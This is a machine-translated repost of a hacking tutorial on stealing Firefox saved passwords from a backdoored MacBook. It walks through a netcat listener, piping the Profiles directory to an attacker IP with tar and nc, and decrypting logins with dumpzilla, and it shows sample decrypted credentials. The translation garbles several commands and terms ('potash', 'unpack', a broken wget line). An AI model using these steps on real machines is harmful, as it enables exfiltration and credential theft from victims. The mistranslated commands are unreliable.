قالب وردپرس درنا توس
Home / Tips and Tricks / How To Store Passwords Stored Remotely In Firefox Browsers «Null Bytes :: WonderHowTo

How To Store Passwords Stored Remotely In Firefox Browsers «Null Bytes :: WonderHowTo



Passwords and data stored in web browsers are extremely valuable to hackers. If you do not make any financial gains, Black Hat hackers can still pass your passwords and personal information on for amusement. Never underestimate what you are worth to a hacker.

Although I'm definitely not in the dark, it was an interesting experience discovering fun methods to conduct post-exploit attacks from a backdoor of the MacBook. So far, I've been surprised to learn how easy it is to misuse tools built into MacOS or install third-party software to reuse a Mac computer.

With this hacking macOS journey, I'll continue this time showing how hackers can easily extract sensitive Firefox directories and extract passwords with dumpzilla, a comprehensive browser forensics tool. While Black Hats could benefit from this knowledge, White Hats, Pentesters and other good-mood hackers will join in as well. In addition, ordinary Mac users will learn how everyday practices such as storing passwords in browsers can endanger them.

Readers should be aware that this attack was performed by a low privilege backdoor (no admin access) against Firefox 60 on macOS 1

0.13 with firewall enabled and AVG antivirus program installed

Step 1: Install Dumpzilla Dependencies

To start from the potash system, install some packages with pip . Pip is a package management system for installing and managing Python packages. These packages have to execute dumpzilla. The complete command is pip install logging lz4 .

  pip install logging lz4

Collect logging
Download from https://files.pythonhosted.org/packages/93/4b/979db9e44be09f71e85c9c8cfc42f258adfb7d93ce01deed2788b2948919/logging-0.4.9.6.tar.gz (96kB)
100% | ████████████████████████████████ | 102 kB 69 kB / s
Building wheels for the collected packages: logging
Running setup.py bdist_wheel to log ... is done
In the directory: /root/.cache/pip/wheels/7d/2e/cb/a51fbdf351b2efebcf857f8b2c8d59b6ccd44ea2e9bb4005d6 stored
Successful logging
Install Collected Packages: Logging
Logging 0.4.9.6 was successfully installed 

There are more dependencies that I found easier to install with APT. Enter apt-get install python3 sqlite3 python-lz4 libnss3 * .

  apt-get install python3 sqlite3 python-lz4 libnss3 *

Read package lists ... Done
Create dependency structure
Read status information ... Done
Recommended packages:
sqlite3-doc
The following NEW packages will be installed:
python-lz4 sqlite3
0 updated, 2 reinstalled, 0 removed and 274 not updated.
Need 879 kB of archives.
After this operation, 2,591 KB of additional space will be allocated.
Get: 1 https://mirrors.dotsrc.org/kali kali-rolling / mainamd64 Python-lz4 amd64 0.10.1 + dfsg1-0.2 [16.6 kB]
Getting: 2 https://mirrors.dotsrc.org/kali kali-rolling / main amd64 sqlite3 amd64 3.23.1-1 [863 kB]
Achieved 879 kb in 15s (60.0 kB / s)
Select the previously unselected package python-lz4.
(Read database ... 181720 files and directories are currently installed.)
Prepare Unpacking ... / python-lz4_0.10.1 + dfsg1-0.2_amd64.deb ...
Unpack Python-lz4 (0.10.1 + dfsg1-0.2) ...
Selecting the previously unselected sqlite3 package.
Preparation for unpacking ... / sqlite3_3.23.1-1_amd64.deb ...
Unpack Sqlite3 (3.23.1-1) ...
Set up Python lz4 (0.10.1 + dfsg1-0.2) ...
Set up Sqlite3 (3.23.1-1) ...
Processing triggers for man-db (2.8.3-2) ... 

Step 2: Downloading dumpzilla

With the necessary packages, it is now safe to download dumpzilla.

Now, at the time of writing In the latest version of dumpzilla, there is an error that causes the passwords stored in Firefox to be decoded automatically. Fortunately, GitHub stores a history of each version that users can access at any time.

In future versions of dumpzilla, it should be possible to simply clone the repository and continue with this article. For the moment, readers should download this version of dumpzilla with the following command wget . This version has been tested and decrypts the passwords saved in Firefox as expected.

  wget # https: //github.com/Busindre/dumpzilla/archive/b3075d1960874ce82ea76a5be9f58602afb61c39.zip' 

Step 3: Extract Dumpzilla

Wget creates a new file b3075d1960874ce82ea76a5be9f58602afb61c39.zip. The compressed dumpzilla files contained therein can be extracted with the command unzip b3075d1960874ce82ea76a5be9f58602afb61c39.zip

  unpack b3075d1960874ce82ea76a5be9f58602afb61c39.zip

Archive: b3075d1960874ce82ea76a5be9f58602afb61c39.zip
b3075d1960874ce82ea76a5be9f58602afb61c39
Create: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 /
Create: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla /
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / addinfo.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / addons.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / bookmarks.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / cert_override.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / cookies.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / downloads_dir.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / downloads_history.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / exceptions.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / extensions.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / forms.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / history.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / offlinecache.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / passwords.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / permissions.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / session.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / ES_templates_dumpzilla / thumbnails.json
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / README.md
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / dumpzilla
Inflate: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / dumpzilla.py 

After extracting dumpzilla, go to the newly created directory "dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 /" with the command cd .

  cd dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39 / 

Step 4: Increase the File Permissions

Then use the command chmod to make sure that the dumpzilla.py file has permission to run in Kali.

  chmod + x dumpzilla.py 

Step 5: Start the Netcat Listener

Use dumpzilla all setup to start a Netcat Listener to get the Firefox directories sent by the Backdoored MacBook.

  nc -l -p 9999 | tar x 

This command instructs Netcat on port ( -p ) 9999 and pipe ( | ) the incoming data in the tar command , Tar is a command-line archiving utility available in both Kali and macOS. The x executing the command tar automatically says extract and stores the data (the compressed directories) that come from the netcat pipe. Directories are compressed during the Netcat transfer for Netcat to handle the data more easily.

To download dumpzilla and configure Netcat to receive the Firefox data. Next, I'll show you how to exfiltrate complete Firefox directories from the Backdoored MacBook.

Step 6: Exfiltrate Backdoored MacBook Directories

Some readers are aware of Firefox's ability to manage multiple profiles. The profiles are typically used by computer-experienced users who need to isolate their work, school, and personal browsing history, bookmarks, and cookies.

In general, most Firefox users have a "default" profile. MacOS has profiles in the lower directory.

  / User /  / Library / Application Support / Firefox / Profiles / 

Note the portion of the directory path. Every user on the MacBook has its own profile / directory. And by default, a user does not have read access (file permissions) to view the profiles of other users.

For example, if Bob's MacBook is compromised with a fake PDF while logged in to his account, the attacker will not be able to see other Firefox profiles on the MacBook that are not part of Bob. At least not without a privilege escalation – which would be beyond the scope of this article.

On the other hand, if the target MacBook was physically regressed, the attacker would probably have full root access (Administrator) to all accounts and Firefox profiles

Based on the intent to spend only the Firefox profile on a single account , connect to the Backdoored MacBook for these next commands.

Change to the desired profile / directory with cd

  cd & # 39; / user /  / Library / Application Support / Firefox / & # 39; 

Then use the following command tar to compress the cf ) profiles / directory (and all contents) and directly ( | ) the data in the Netcat ( nc ) command. The attacker's system and IP address are represented as 1.2.3.4 so be sure to change the IP address to the VPS or local IP address used by the attacker.

  tar cf - Profiles / | nc 1.2.3.4 9999 

While Netcat is transferring the directory, the terminals seem to have frozen or stopped. It took about two minutes for the transfer to complete when a Firefox profile was converted to exfiltrating with just 12 hours of stored data. I imagine a Firefox profile with a month-long browser history, months of browser cookies and hundreds of bookmarks could take a lot of time. Be patient here. If any of the data in the directories becomes corrupted when exfiltrated into the Kali system, the passwords stored in the Firefox profiles may not be decodable.

Step 7: Unlock Passwords

Back on the potash machine, there will be a new profile / directory. There will be at least one directory after the naming scheme xxxxxxxx.default / . By default, Firefox automatically generates eight random characters ( xxxxxxxx ) and prefixes them with the profile name. For example, users with multiple profiles can have directories named "w9wuahzu.work/", "ei49j03w.personal /" and "r3h84t9t.default". Each directory can be individually processed with dumpzilla.

To extract passwords from a specific Firefox profile, use the command python3 dumpzilla.py Profiles / xxxxxxxxfault / –Passwords .

  python3 dumpzilla .py profiles / xxxxxxxx.default / --passwords

============================================= ======================================= == =======
== decode passwords
============================================= ======================================= == ======
=> Source file: /tmp/dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/9kwbffy3.default/logins.json
=> SHA256 hash: 9df5b2c418bbb967e63b556162e6d11ed509a9a5c67580f3c79e089d954ade91

Web: https://www.facebook.com
Username: kevin.poulsen@gmail.com
Password: DarkDante23

Web: https://accounts.google.com
Username: kevin.poulsen
Password: Porsche944

Web: https://www.reddit.com
Username: hackerone@gmail.com
Password: DarkDante23

Web: https://www.amazon.com
Username: kevin.poulsen@gmail.com
Password: DarkDante944

Web: https://login.live.com
Username: kpoulsen@live.com
Password: DarkDante123

Web: https://www.netflix.com
Username: hackerone@gmail.com
Password: Porsche944

Web: https://login.aliexpress.com
Username: Poulsen
Password: Jordan626

============================================= ======================================= == =========
== total information
============================================= ======================================= == ========

Total Decode Passwords: 7
Total Passwords: 7 

How to Protect Against Web Browser Attacks

Do not let this article stop you from using Firefox, or pretend that Google Chrome is more secure. Google Chrome is just as vulnerable to the actions described in this article. Instead of seeking protection in web browsers, you should make minor behavioral changes to make such attacks harder for hackers.

Do not miss: How To Manage Your Passwords With KeePassX In MacOS

Title Picture by tokyoneon / Null Byte

Source link